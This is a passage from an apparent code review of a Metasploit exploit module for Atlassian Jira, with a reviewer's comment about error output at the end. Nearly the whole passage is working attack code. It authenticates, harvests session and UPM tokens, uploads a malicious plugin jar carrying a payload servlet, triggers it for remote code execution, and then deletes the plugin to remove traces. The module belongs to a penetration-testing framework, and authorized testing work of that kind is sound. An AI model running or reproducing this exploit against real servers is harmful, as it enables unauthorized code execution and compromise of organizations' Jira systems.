modules/exploits/multi/http/jira_plugin_upload.rb

```diff
@@ -0,0 +1,241 @@
+      fail_with(Failure::Unknown, 'Unable to access the web application')
+    end
+    print_status('Retrieving Session ID and XSRF token...')
+    auth_res = do_auth
+    good_sid = get_sid(auth_res)
+    good_cookie = 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}"
+    res = query_for_upm_token(good_cookie)
+    upm_token = get_upm_token(res)
+    upload_exec(upm_token, good_cookie)
+  end
+
+  # Upload, execute, and remove servlet
+  def upload_exec(upm_token, good_cookie)
+    contents = ''
+    name = Rex::Text.rand_text_alpha(8)
+
+    atlassian_plugin_xml = %Q{
+    <atlassian-plugin name="#{name}" key="#{name}" plugins-version="2">
+    <plugin-info>
+        <description></description>
+        <version>1.0</version>
+        <vendor name="" url="" />
+
+        <param name="post.install.url">/plugins/servlet/metasploit/PayloadServlet</param>
+        <param name="post.upgrade.url">/plugins/servlet/metasploit/PayloadServlet</param>
+
+    </plugin-info>
+
+    <servlet name="#{name}" key="metasploit.PayloadServlet" class="metasploit.PayloadServlet">
+        <description>"#{name}"</description>
+        <url-pattern>/metasploit/PayloadServlet</url-pattern>
+    </servlet>
+
+    </atlassian-plugin>
+    }
+
+    # Generates .jar file for upload
+    if target.name =~ /Java/
+      zip = payload.encoded_jar
+      zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)
+
+      servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
+      zip.add_file('/metasploit/PayloadServlet.class', servlet)
+
+      contents = zip.pack
+    end
+
+    boundary = rand_text_numeric(27)
+
+    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"plugin\"; "
+    data << "filename=\"#{name}.jar\"\r\nContent-Type: application/x-java-archive\r\n\r\n"
+    data << contents
+    data << "\r\n--#{boundary}--"
+
+    print_status("Attempting to upload #{name}")
+    res = send_request_raw({
+      'uri'     => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/?token=#{upm_token}"),
+      'method'  => 'POST',
+      'data'    => data,
+      'headers' =>
+        {
+          'Content-Type'	 => 'multipart/form-data; boundary=' + boundary,
+          'Cookie' => "#{good_cookie}"
+        }
+    }, 25)
+
+    if res && res.code == 202
+      print_status("Successfully uploaded #{name}")
+
+      print_status("Executing #{name}")
+      Rex::ThreadSafe.sleep(3)
+      send_request_cgi({
+        'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),
+        'method'       => 'GET',
+        'cookie'       => "#{good_cookie}"
+      })
+
+      print_status("Deleting #{name}")
+      send_request_cgi({
+        'uri'          => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/#{name}-key"),
+        'method'       => 'DELETE',
+        'cookie'       => "#{good_cookie}"
+      })
+
+    else
+      print_status("Error uploading #{name}")
```

Comment:
Perhaps print `res.code` and perhaps the body too?  May help head off target specific issues with this module